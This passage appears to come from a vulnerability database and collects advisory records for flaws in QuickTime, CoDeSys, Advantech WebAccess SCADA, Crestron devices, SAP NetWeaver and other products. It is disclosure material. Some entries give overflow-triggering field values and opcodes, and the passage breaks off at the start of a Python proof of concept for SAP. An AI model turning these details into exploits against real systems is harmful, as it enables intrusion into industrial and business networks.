<http://docs.info.apple.com/article.html?artnum=303101> * QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html> * About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ8V8iX0pj593lg50AQJ85wf+OuHVseQVzZ0uI8h8TnmtAJmjzV6tp3Cj 34jwpSLlvo5S8svIHChcX/BYOwKVL/uQZswsjk/mbEu+TrPcVKPd7VPCetxIXVey AdC5hsAH1Wm0MnvY1LgvONo8IQ9RlT6Rj6fY7k7QhPUWsYxj/rDCWDAY9kgsHXc/ HpXWL/Cy5va35z8aYHrLVlxmofKrOWtX0PVa6lSKV8lIsY+TDihA5tYIb5wRDVxL osieJ+MHSXGchXpjX2c0o6Ja6vhJNR61LEwelk9FMLT1JRTkp+wz9/AoVUSyZ/hy 0WBP0M8cwl8koWgijNcLXA18YX8QtDftAVRwpwHKMrbNCYdrWblYVw== =5Kiq -----END PGP SIGNATURE-----
var-200512-0611 Multiple heap-based buffer overflows in QuickTime.qts in Apple QuickTime Player 7.0.3 and iTunes 6.0.1 (3) and earlier allow remote attackers to cause a denial of service (crash) and execute arbitrary code via a .mov file with (1) a Movie Resource atom with a large size value, or (2) an stsd atom with a modified Sample Description Table size value, and possibly other vectors involving media files. NOTE: item 1 was originally identified by CVE-2005-4127 for a pre-patch announcement, and item 2 was originally identified by CVE-2005-4128 for a pre-patch announcement. Apple's QuickTime is a player for files and streaming media in a variety of different formats. A flaw in QuickTime's handling of Targa (TGA) image format files could allow a remote attacker to execute arbitrary code on a vulnerable system. Apple From QuickTime Version that fixes multiple vulnerabilities in 7.0.4 Has been released.Arbitrary code may be executed by a remote third party, DoS You can be attacked. For more information, see the information provided by the vendor. These issues arise when the application handles specially crafted QTIF, TGA, TIFF, and GIF image formats. Successful exploits of these issues may allow remote attackers to trigger a denial-of-service condition or to gain unauthorized access. This issue affects both Mac OS X and Microsoft Windows releases of the software. This issue may be triggered when the application processes a malformed movie (.MOV) file. Successful exploitation will result in execution of arbitrary code in the context of the currently logged in user. This issue affects Apple QuickTime 7.0.3 and iTunes 6.0.1. Earlier versions may also be affected. Multiple buffer overflow vulnerabilities exist in QuickTime.qts. This specific flaw exists within the QuickTime.qts file which many applications access QuickTime's functionality through. By specially crafting atoms within a movie file, a direct heap overwrite is triggered, and reliable code execution is then possible. Technical Details: Technical Description: The code in QuickTime.qts responsible for the size of the Sample Description Table entries from the 'stsd' atom in a QuickTime-format movie on the heap. According to developer.apple.com, the format of the Sample Description Atom is as follows: Field Description ---------------------------------------------------------------- Size 32-bit int Data Format 4 char code Reserved 6 bytes that must be 0 Data Reference Index 16-bit int Hint Track Version 16-bit unsigned int Last compatible hint track version 16-bit unsigned int Max Packet Size 32-bit int Additional Data Table Variable By setting the size of the Sample Description Table to a size of 00 15 - 00 D0 will cause a heap-based overflow. By supplying the "Last compatible hint track version" field with the value of 00 05 - 00 09, an insufficiently-sized heap block will be allocated, resulting in a classic complete heap memory overwrite during the RtlAllocateHeap() function and the attacker can control memory with data taken from the filename of the .MOV file. This vulnerability can be successfully exploited via an embedded media player in an HTML page, email, or HTML link. References QuickTime: QuickTime File Format http://developer.apple.com/documentation/QuickTime/QTFF/index.html Protection: Retina Network Security Scanner has been updated to identify this vulnerability. Vendor Status: Apple has released a patch for this vulnerability. The patch is available via the Updates section of the affected applications. This vulnerability has been assigned the CVE identifier CVE-2005-4092. Credit: Discovery: Karl Lynn Greetings: 0x41414141 Copyright (c) 1998-2006 eEye Digital Security Permission is hereby granted for the redistribution of this alert electronically. It is not to be edited in any way without express consent of eEye. If you wish to reprint the whole or any part of this alert in any other medium excluding electronic medium, please email alert@eEye.com for permission. Disclaimer The information within this paper may change without notice. Use of this information constitutes acceptance for use in an AS IS condition. There are no warranties, implied or express, with regard to this information. In no event shall the author be liable for any direct or indirect damages whatsoever arising out of or in connection with the use or spread of this information. -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-011A Apple QuickTime Vulnerabilities Original release date: January 11, 2006 Last revised: January 11, 2006 Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows XP * Microsoft Windows 2000 Overview Apple has released QuickTime 7.0.4 to correct multiple vulnerabilities. The impacts of these vulnerabilities include execution of arbitrary code and denial of service. I. (CAN-2005-3713) II. Impact The impacts of these vulnerabilities vary. For information about specific impacts, please see the Vulnerability Notes. III. Solution Upgrade Upgrade to QuickTime 7.0.4. Appendix A. References * US-CERT Vulnerability Note VU#629845 - <http://www.kb.cert.org/vuls/id/629845> * US-CERT Vulnerability Note VU#921193 - <http://www.kb.cert.org/vuls/id/921193> * US-CERT Vulnerability Note VU#115729 - <http://www.kb.cert.org/vuls/id/115729> * US-CERT Vulnerability Note VU#150753 - <http://www.kb.cert.org/vuls/id/150753> * US-CERT Vulnerability Note VU#913449 - <http://www.kb.cert.org/vuls/id/913449> * CVE-2005-2340 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340> * CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092> * CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707> * CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710> * CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713> * Security Content for QuickTime 7.0.4 - <http://docs.info.apple.com/article.html?artnum=303101> * QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html> * About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ8V8iX0pj593lg50AQJ85wf+OuHVseQVzZ0uI8h8TnmtAJmjzV6tp3Cj 34jwpSLlvo5S8svIHChcX/BYOwKVL/uQZswsjk/mbEu+TrPcVKPd7VPCetxIXVey AdC5hsAH1Wm0MnvY1LgvONo8IQ9RlT6Rj6fY7k7QhPUWsYxj/rDCWDAY9kgsHXc/ HpXWL/Cy5va35z8aYHrLVlxmofKrOWtX0PVa6lSKV8lIsY+TDihA5tYIb5wRDVxL osieJ+MHSXGchXpjX2c0o6Ja6vhJNR61LEwelk9FMLT1JRTkp+wz9/AoVUSyZ/hy 0WBP0M8cwl8koWgijNcLXA18YX8QtDftAVRwpwHKMrbNCYdrWblYVw== =5Kiq -----END PGP SIGNATURE-----
var-200512-0294 Buffer overflow in Apple Quicktime before 7.0.4 allows remote attackers to execute arbitrary code via crafted TGA image files. Apple's QuickTime is a player for files and streaming media in a variety of different formats. For more information, see the information provided by the vendor. QuickTime is prone to a remote buffer-overflow vulnerability. This issue presents itself when the application processes a specially crafted TGA image file. A successful attack can result in a remote compromise. Versions prior to QuickTime 7.0.4 are vulnerable. Fortinet Security Advisory: FSA-2006-04 Apple QuickTime Player Improper Memory Access Vulnerability Advisory Date : January 12, 2006 Reported Date : November 28, 2005 Vendor : Apple computers Affected Products : Apple QuickTime Player v7.0.3 Severity : High Reference : http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707 http://docs.info.apple.com/article.html?artnum=303101 http://www.securityfocus.com/bid/16202/info Description : Fortinet Security Research Team (FSRT) has discovered a Improper Memory Access Vulnerability in the Apple QuickTime Player. Impact : Execute arbitrary code Solution : Apple Computers has released a security update for this vulnerability, which is available for downloading from Apples's web site under security update. Fortinet Protection: Fortinet is protecting network from this vulnerability with latest IPS update. Acknowledgment : Dejun Meng of Fortinet Security Research team found this vulnerability. Disclaimer : Although Fortinet has attempted to provide accurate information in these materials, Fortinet assumes no legal responsibility for the accuracy or completeness of the information. Please note that Fortinet's product information does not constitute or contain any guarantee, warranty or legally binding representation, unless expressly identified as such in a duly signed writing. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/ . -----BEGIN PGP SIGNED MESSAGE----- Hash: SHA1 National Cyber Alert System Technical Cyber Security Alert TA06-011A Apple QuickTime Vulnerabilities Original release date: January 11, 2006 Last revised: January 11, 2006 Source: US-CERT Systems Affected Apple QuickTime on systems running * Apple Mac OS X * Microsoft Windows XP * Microsoft Windows 2000 Overview Apple has released QuickTime 7.0.4 to correct multiple vulnerabilities. The impacts of these vulnerabilities include execution of arbitrary code and denial of service. I. Description Apple QuickTime 7.0.4 resolves a number of image and media file handling vulnerabilities. (CAN-2005-3713) II. Impact The impacts of these vulnerabilities vary. For information about specific impacts, please see the Vulnerability Notes. Potential consequences include remote execution of arbitrary code or commands and denial of service. III. Solution Upgrade Upgrade to QuickTime 7.0.4. Appendix A. References * US-CERT Vulnerability Note VU#629845 - <http://www.kb.cert.org/vuls/id/629845> * US-CERT Vulnerability Note VU#921193 - <http://www.kb.cert.org/vuls/id/921193> * US-CERT Vulnerability Note VU#115729 - <http://www.kb.cert.org/vuls/id/115729> * US-CERT Vulnerability Note VU#150753 - <http://www.kb.cert.org/vuls/id/150753> * US-CERT Vulnerability Note VU#913449 - <http://www.kb.cert.org/vuls/id/913449> * CVE-2005-2340 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-2340> * CVE-2005-4092 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-4092> * CVE-2005-3707 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3707> * CVE-2005-3710 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3710> * CVE-2005-3713 - <http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2005-3713> * Security Content for QuickTime 7.0.4 - <http://docs.info.apple.com/article.html?artnum=303101> * QuickTime 7.0.4 - <http://www.apple.com/support/downloads/quicktime704.html> * About the Mac OS X 10.4.4 Update (Delta) - <http://docs.info.apple.com/article.html?artnum=302810> ____________________________________________________________________ The most recent version of this document can be found at: <http://www.us-cert.gov/cas/techalerts/TA06-011A.html> ____________________________________________________________________ Feedback can be directed to US-CERT Technical Staff. Please send email to <cert@cert.org> with "TA06-011A Feedback VU#913449" in the subject. ____________________________________________________________________ For instructions on subscribing to or unsubscribing from this mailing list, visit <http://www.us-cert.gov/cas/signup.html>. ____________________________________________________________________ Produced 2006 by US-CERT, a government organization. Terms of use: <http://www.us-cert.gov/legal.html> ____________________________________________________________________ Revision History January 11, 2006: Initial release -----BEGIN PGP SIGNATURE----- Version: GnuPG v1.2.1 (GNU/Linux) iQEVAwUBQ8V8iX0pj593lg50AQJ85wf+OuHVseQVzZ0uI8h8TnmtAJmjzV6tp3Cj 34jwpSLlvo5S8svIHChcX/BYOwKVL/uQZswsjk/mbEu+TrPcVKPd7VPCetxIXVey AdC5hsAH1Wm0MnvY1LgvONo8IQ9RlT6Rj6fY7k7QhPUWsYxj/rDCWDAY9kgsHXc/ HpXWL/Cy5va35z8aYHrLVlxmofKrOWtX0PVa6lSKV8lIsY+TDihA5tYIb5wRDVxL osieJ+MHSXGchXpjX2c0o6Ja6vhJNR61LEwelk9FMLT1JRTkp+wz9/AoVUSyZ/hy 0WBP0M8cwl8koWgijNcLXA18YX8QtDftAVRwpwHKMrbNCYdrWblYVw== =5Kiq -----END PGP SIGNATURE-----
var-201112-0097 Stack-based buffer overflow in the CmpWebServer component in 3S CoDeSys 3.4 SP4 Patch 2 and earlier, as used on the ABB AC500 PLC and possibly other products, allows remote attackers to execute arbitrary code via a long URI to TCP port 8080. CoDeSys is a powerful PLC software programming tool that supports IEC61131-3 standard IL, ST, FBD, LD, CFC, SFC six PLC programming languages. The GatewayService has an integer overflow. The GatewayService uses the 32-bit value offset at the header 0x0c to specify the size of the received data. The program receives this value, increasing the number of 0x34 and allocating the amount of memory can cause an integer overflow. CmpWebServer is a component of the 3SRTESrv3 and CoDeSysControlService services for handling 8080 port connections. The function 0040f480 copies the input URI to a limited stack buffer, which can trigger a buffer overflow. 3S CoDeSys handles the Content-Length value in an HTTP POST request to trigger a null pointer reference. CoDeSys is prone to a stack-based buffer-overflow and an integer-overflow vulnerability. Failed attacks may cause a denial-of-service condition
var-201805-1143 In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several stack-based buffer overflow vulnerabilities have been identified, which may allow an attacker to execute arbitrary code. This vulnerability allows remote attackers to execute arbitrary code on affected installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within notify2.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length stack-based buffer. An attacker can leverage this vulnerability to execute code under the context of Administrator. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). A stack buffer overflow vulnerability exists in several Advantech products
var-201805-1144 In Advantech WebAccess versions V8.2_20170817 and prior, WebAccess versions V8.3.0 and prior, WebAccess Dashboard versions V.2.0.15 and prior, WebAccess Scada Node versions prior to 8.3.1, and WebAccess/NMS 2.0.3 and prior, several SQL injection vulnerabilities have been identified, which may allow an attacker to disclose sensitive information from the host. This vulnerability allows remote attackers to disclose sensitive information on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within Quality.asp. When parsing the ItemGroupIdAry parameter, the process does not properly validate a user-supplied string before using it to construct SQL queries. An attacker can leverage this vulnerability to disclose sensitive information under the context of the database. Advantech WebAccess and others are products of Advantech. Advantech WebAccess is a browser-based HMI/SCADA software. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. WebAccess Dashboard is one of the dashboard components; WebAccess Scada Node is one of the monitoring node components. WebAccess/NMS is a suite of web browsers for the Network Management System (NMS). SQL injection vulnerabilities exist in several Advantech products. Advantech WebAccess is prone to the following security vulnerabilities: 1. Multiple SQL-injection vulnerabilities 2. An information-disclosure vulnerability 3. A file-upload vulnerability 4. Multiple directory-traversal vulnerabilities 5. Multiple stack-based buffer-overflow vulnerabilities 6. A heap-based buffer-overflow vulnerability 7. Multiple arbitrary code-execution vulnerabilities 8. A denial-of-service vulnerability 9. A security-bypass vulnerability 10. A privilege-escalation vulnerability An attacker can exploit these issues to execute arbitrary code in the context of the application, or modify data, or exploit latent vulnerabilities in the underlying database, delete arbitrary files, gain elevated privileges, perform certain unauthorized actions, upload arbitrary files to the affected application gain unauthorized access and obtain sensitive information. Failed attacks will cause denial of service conditions
var-201806-1058 Crestron TSW-1060, TSW-760, TSW-560, TSW-1060-NC, TSW-760-NC, and TSW-560-NC devices before 2.001.0037.001 allow unauthenticated remote code execution via a Bash shell service in Crestron Toolbox Protocol (CTP). This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Crestron's Android-based products. Authentication is not required to exploit this vulnerability.The specific flaw exists within the RESTARTSERVICE command of the CTP console. The issue results from the lack of proper validation of a user-supplied string before using it to execute a system call. An attacker could leverage this vulnerability to execute code with root privileges. CrestronTSW-1060 and other are touch screen devices of Crestron Electronics of the United States. There are security vulnerabilities in several Crestron products. Multiple OS command-injection vulnerabilities. 2. An access-bypass vulnerability. 3. A security-bypass vulnerability. Attackers can exploit these issues to execute arbitrary OS commands and bypass certain security restrictions, perform unauthorized actions, or gain sensitive information within the context of the affected system. Failed exploit attempts will likely result in denial of service conditions
var-201902-0647 LCDS Laquis SCADA prior to version 4.1.0.4150 allows execution of script code by opening a specially crafted report format file. This may allow remote code execution, data exfiltration, or cause a system crash. Script embedded in a crafted file can create files in arbitrary locations using the AddComboFile method. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of LAquis SCADA Software. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the processing of the MemoryWriteWord method. The issue results from the lack of proper validation of user-supplied data, which can result in a memory corruption condition. An attacker can leverage this vulnerability to execute code in the context of the aq process. LAquis SCADA is a suite of SCADA software for monitoring and data acquisition. LCDS LAquis SCADA is prone to multiple security vulnerabilities. Failed attempts will likely cause a denial-of-service condition. LCDS LAquis SCADA version 4.1.0.3870 is vulnerable; other versions may also be affected
var-200202-0006 Vulnerabilities in a large number of SNMP implementations allow remote attackers to cause a denial of service or gain privileges via SNMPv1 trap handling, as demonstrated by the PROTOS c06-SNMPv1 test suite. NOTE: It is highly likely that this candidate will be SPLIT into multiple candidates, one or more for each vendor. This and other SNMP-related candidates will be updated when more accurate information is available. Multiple vendor SNMPv1 Trap handling implementations contain vulnerabilities that may allow unauthorized privileged access, denial-of-service conditions, or unstable behavior . If your site uses SNMP in any capacity, the CERT/CC encourages you to read the information provided below. ------------ This vulnerability information is a summary of multiple vulnerabilities released at the same time. Please note that the contents of vulnerability information other than the title are included. ------------ SNMP Protocol is status and performance information MIB (Management Information Base) Protocol used to exchange Management side SNMP Managers such as managed routers, switches and printers SNMP Communicates with management network devices called agents. Because of its wide acceptance in the market, SNMP Has become the standard for SNMP protocol version1 Is SNMPv1 Is the most widely implemented. this SNMPv1 Sent from the agent to the manager in the implementation of SNMP Trap message and sent from the manager to the agent SNMP Decrypt the request message / There are problems in interpreting. If this problem is used by an attacker, the following actions may be executed. Many other programs that you implement may also be affected because of a protocol problem. On the target host SNMP If the service is running, an attacker could execute arbitrary code ・ If a buffer overflow attack is feasible and a very long trap message SNMP If the host on which the service is running receives, the application may go into a denial of service state The effects described above vary from application to application. For details, refer to each product.Please refer to the “Overview” for the impact of this vulnerability. Windows 95 is prone to a denial-of-service vulnerability. MPE/iX is an Internet-ready operating system for the HP e3000 class servers. It is possible to crash the service by transmitting to it a maliciously constructed SNMPv1 request PDU. It was previously known as UCD-SNMP. They typically notify the manager that some event has occured or otherwise provide information about the status of the agent. Multiple vulnerabilities have been discovered in a number of SNMP implementations. The vulnerabilities are known to exist in the process of decoding and interpreting SNMP trap messages. Among the possible consequences are denial of service and allowing attackers to compromise target systems. These depend on the individual vulnerabilities in each affected product. HP has confirmed that large traps will cause OpenView Network Node Manager to crash. This may be due to an exploitable buffer overflow condition
var-200107-0035 slapd in OpenLDAP 1.x before 1.2.12, and 2.x before 2.0.8, allows remote attackers to cause a denial of service (crash) via an invalid Basic Encoding Rules (BER) length field. Multiple versions of OpenLDAP contain vulnerabilities that may allow denial-of-service attacks. These vulnerabilities were revealed using the PROTOS LDAPv3 test suite and are documented in CERT Advisory CA-2001-18. If your site uses this product, the CERT/CC encourages you to follow the advice provided below. Vulnerabilities exist in slapd in OpenLDAP 1.x versions prior to 1.2.12 and 2.x versions prior to 2.0.8
var-200607-0396 Multiple stack-based buffer overflows in eIQnetworks Enterprise Security Analyzer (ESA) before 2.5.0, as used in products including (a) Sidewinder, (b) iPolicy Security Manager, (c) Astaro Report Manager, (d) Fortinet FortiReporter, (e) Top Layer Network Security Analyzer, and possibly other products, allow remote attackers to execute arbitrary code via long (1) DELTAINTERVAL, (2) LOGFOLDER, (3) DELETELOGS, (4) FWASERVER, (5) SYSLOGPUBLICIP, (6) GETFWAIMPORTLOG, (7) GETFWADELTA, (8) DELETERDEPDEVICE, (9) COMPRESSRAWLOGFILE, (10) GETSYSLOGFIREWALLS, (11) ADDPOLICY, and (12) EDITPOLICY commands to the Syslog daemon (syslogserver.exe); (13) GUIADDDEVICE, (14) ADDDEVICE, and (15) DELETEDEVICE commands to the Topology server (Topology.exe); the (15) LICMGR_ADDLICENSE command to the License Manager (EnterpriseSecurityAnalyzer.exe); the (16) TRACE and (17) QUERYMONITOR commands to the Monitoring agent (Monitoring.exe); and possibly other vectors related to the Syslog daemon (syslogserver.exe). Used in the following products eIQnetworks Enterprise Security Analyzer (ESA) Is Syslog daemon (syslogserver.exe) A stack-based buffer overflow vulnerability exists due to a flaw in handling. During the processing of long arguments to the LICMGR_ADDLICENSE command a classic stack based buffer overflow occurs. Authentication is not required to exploit this vulnerability.The specific flaw exists within the Syslog daemon, syslogserver.exe, during the processing of long strings transmitted to the listening TCP port. The vulnerability is not exposed over UDP. The default configuration does not expose the open TCP port. eIQnetworks Enterprise Security Analyzer (ESA) is an enterprise-level security management platform. The following commands are known to be affected by this vulnerability:  DELTAINTERVAL  LOGFOLDER  DELETELOGS  FWASERVER  SYSLOGPUBLICIP  GETFWAIMPORTLOG  GETFWADELTA  DELETERDEPDEVICE  COMPRESSRAWLOGFILE  GETSYSLOGFIREWALLS  ADDPOLICY  EDITPOLICY. OEM vendors' versions prior to 4.6 are also vulnerable. -- About the TippingPoint Security Research Team (TSRT): The TippingPoint Security Research Team (TSRT) consists of industry recognized security researchers that apply their cutting-edge engineering, reverse engineering and analysis talents in our daily operations. More information about the team is available at: http://www.tippingpoint.com/security The by-product of these efforts fuels the creation of vulnerability filters that are automatically delivered to our customers' intrusion prevention systems through the Digital Vaccine(R) service. ZDI-06-023: eIQnetworks Enterprise Security Analyzer Syslog Server Buffer Overflow Vulnerability http://www.zerodayinitiative.com/advisories/ZDI-06-023.html July 25, 2006 -- CVE ID: CVE-2006-3838 -- Affected Vendor: eIQnetworks -- Affected Products: eIQnetworks Enterprise Security Analyzer Astaro Report Manager (OEM) Fortinet FortiReporter (OEM) iPolicy Security Reporter (OEM) SanMina Viking Multi-Log Manager (OEM) Secure Computing G2 Security Reporter (OEM) Top Layer Network Security Analyzer (OEM) -- TippingPoint(TM) IPS Customer Protection: TippingPoint IPS customers have been protected against this vulnerability since by Digital Vaccine protection filter ID N/A. Authentication is not required to exploit this vulnerability. -- Vendor Response: eIQnetworks has issued an update to correct this vulnerability. More details can be found at: http://www.eiqnetworks.com/products/enterprisesecurity/EnterpriseSecurityAnalyzer/ESA_2.5.0_Release_Notes.pdf -- Disclosure Timeline: 2006.05.10 - Vulnerability reported to vendor - Digital Vaccine released to TippingPoint customers 2006.07.25 - Coordinated public release of advisory -- Credit: This vulnerability was discovered by Titon, JxT, KF and the rest of Bastard Labs. -- About the Zero Day Initiative (ZDI): Established by TippingPoint, a division of 3Com, The Zero Day Initiative (ZDI) represents a best-of-breed model for rewarding security researchers for responsibly disclosing discovered vulnerabilities. Researchers interested in getting paid for their security research through the ZDI can find more information and sign-up at: http://www.zerodayinitiative.com The ZDI is unique in how the acquired vulnerability information is used. 3Com does not re-sell the vulnerability details or any exploit code. Instead, upon notifying the affected product vendor, 3Com provides its customers with zero day protection through its intrusion prevention technology. Explicit details regarding the specifics of the vulnerability are not exposed to any parties until an official vendor patch is publicly available. Furthermore, with the altruistic aim of helping to secure a broader user base, 3Com provides this vulnerability information confidentially to security vendors (including competitors) who have a vulnerability protection or mitigation product. _______________________________________________ Full-Disclosure - We believe in it. Charter: http://lists.grok.org.uk/full-disclosure-charter.html Hosted and sponsored by Secunia - http://secunia.com/
var-201601-0038 Multiple stack-based buffer overflows in Advantech WebAccess before 8.1 allow remote attackers to execute arbitrary code via unspecified vectors. Authentication is not required to exploit this vulnerability.The specific flaw exists within the implementation of the 0x27B0 IOCTL in the ViewSrv subsystem. A stack-based buffer overflow vulnerability exists in a call to BwBuildPath. An attacker can use this vulnerability to execute arbitrary code in the context of an administrator of the system. WebAccess HMI/SCADA software provides remote control and management, allowing users to easily view and configure automation equipment in facility management systems, power stations and building automation systems
var-201801-0394 TP-Link WVR, WAR and ER devices allow remote authenticated administrators to execute arbitrary commands via command injection in the new-interface variable in the cmxddns.lua file. TP-LinkWVR, WAR and ERdevices are different series of router products from China TP-LINK. Security vulnerabilities exist in TP-LinkWVR, WAR, and ER devices
var-201805-1147 WPLSoft in Delta Electronics versions 2.45.0 and prior utilizes a fixed length heap buffer where a value larger than the buffer can be read from a file into the buffer, causing the buffer to be overwritten, which may allow remote code execution or cause the application to crash. Delta Electronics WPLSoft Contains a buffer error vulnerability.Information is obtained, information is altered, and service operation is disrupted (DoS) There is a possibility of being put into a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Delta Industrial Automation WPLSoft. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.The specific flaw exists within the parsing of dvp files. The issue results from the lack of proper validation of the length of user-supplied data prior to copying it to a fixed-length heap-based buffer. An attacker can leverage this vulnerability to execute arbitrary code under the context of the current process. Delta Industrial Automation is the industry automation vendor for power management and cooling solutions worldwide. The length of the data provided by the user is not verified. WPLSoft (Delta PLC programming software) is a PLC program programming software used by Delta Electronics in the WINDOWS operating system environment. Delta Electronics WPLSoft has a heap buffer overflow vulnerability. Execute or cause the application to crash. A stack-based buffer-overflow vulnerability 2. A heap-based buffer-overflow vulnerability 3. Delta Industrial WPLSoft Version 2.45.0 and prior versions are vulnerable
var-201904-0181 Advantech WebAccess/SCADA, Versions 8.3.5 and prior. Multiple stack-based buffer overflow vulnerabilities, caused by a lack of proper validation of the length of user-supplied data, may allow remote code execution. Advantech WebAccess/SCADA Contains a buffer error vulnerability.Information is acquired, information is falsified, and denial of service (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Advantech WebAccess Node. Authentication is not required to exploit this vulnerability.The specific flaw exists within bwthinfl.exe, which is accessed through the 0x2711 IOCTL in the webvrpcs process. An attacker can leverage this vulnerability to execute code in the context of Administrator. Advantech WebAccess/SCADA is a set of browser-based SCADA software from Advantech. The software supports dynamic graphical display and real-time data control, and provides the ability to remotely control and manage automation equipment. A buffer overflow vulnerability exists in Advantech WebAccess/SCADA. This vulnerability stems from the fact that when the network system or product performs operations on the memory, the data boundary is not correctly verified, resulting in execution to other associated memory locations. erroneous read and write operations
var-202001-0833 A Denial of Service vulnerability exists in the WRITE_C function in the msg_server.exe module in SAP NetWeaver 2004s, 7.01 SR1, 7.02 SP06, and 7.30 SP04 when sending a crafted SAP Message Server packet to TCP ports 36NN and/or 39NN. SAP NetWeaver Contains an array index validation vulnerability.Denial of service operation (DoS) May be in a state. This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of SAP Netweaver ABAP. Authentication is not required to exploit this vulnerability. The specific flaw exists within the msg_server.exe listening on 3900 by default. When the msg_server parses a message with opcode 0x43 and sub-opcode 0x04 it uses a user suplied size field to copy a string into a static sized stack buffer. The resulting buffer overflow can lead to remote code execution under the context of the process. Authentication is not required to exploit this vulnerability.The specific flaw exists within the way SAP NetWeaver handles packages with opcode 0x43. If a package with sub opcode 0x4 contains a long parameter value string NetWeaver will eventually write a \x00 byte onto the stack to mark the end of the string. SAP NetWeaver has a defect in the message with the opcode 0x43. SAP NetWeaver is the technical foundation for SAP Business Suite solutions, SAP xApps composite applications, partner solutions, and custom applications. Msg_server.exe listens to port 3900 by default. Arbitrary code. Successfully exploiting these issues may allow an attacker to execute arbitrary code with the privileges of the user running the affected application or cause denial-of-service conditions. The following products are affected: SAP Netweaver 2004s SAP Netweaver 7.01 SR1 SAP Netweaver 7.02 SP06 SAP Netweaver 7.30 SP04. Core Security - Corelabs Advisory http://corelabs.coresecurity.com/ CORE-2012-1128 1. *Advisory Information* Title: SAP Netweaver Message Server Multiple Vulnerabilities Advisory ID: CORE-2012-1128 Advisory URL: http://www.coresecurity.com/content/SAP-netweaver-msg-srv-multiple-vulnerabilities Date published: 2013-02-13 Date of last update: 2013-02-13 Vendors contacted: SAP Release mode: Coordinated release 2. *Vulnerability Information* Class: Improper Validation of Array Index [CWE-129], Buffer overflow [CWE-119] Impact: Code execution, Denial of service Remotely Exploitable: Yes Locally Exploitable: No CVE Name: CVE-2013-1592, CVE-2013-1593 3. By sending different messages, the different vulnerabilities can be triggered. 4. *Vulnerable packages* . Older versions are probably affected too, but they were not checked. 5. *Non-vulnerable packages* . Vendor did not provide this information. 6. *Vendor Information, Solutions and Workarounds* SAP released the security note 1800603 [2] regarding these issues. 7. *Credits* Vulnerability [CVE-2013-1592] was discovered by Martin Gallo and Francisco Falcon, and additional research was performed by Francisco Falcon. Vulnerability [CVE-2013-1593] was discovered and researched by Martin Gallo from Core Security Consulting Services. The publication of this advisory was coordinated by Fernando Miranda from Core Advisories Team. 8. *Technical Description / Proof of Concept Code* The following python script is the main PoC that can be used to reproduce all vulnerabilities described below: /----- import socket, struct from optparse import OptionParser # Parse the target options parser = OptionParser() parser.add_option("-d", "--hostname", dest="hostname", help="Hostname", default="localhost") parser.add_option("-p", "--port", dest="port", type="int", help="Port number", default=3900) (options, args) = parser.parse_args() client_string = '-'+' '*39 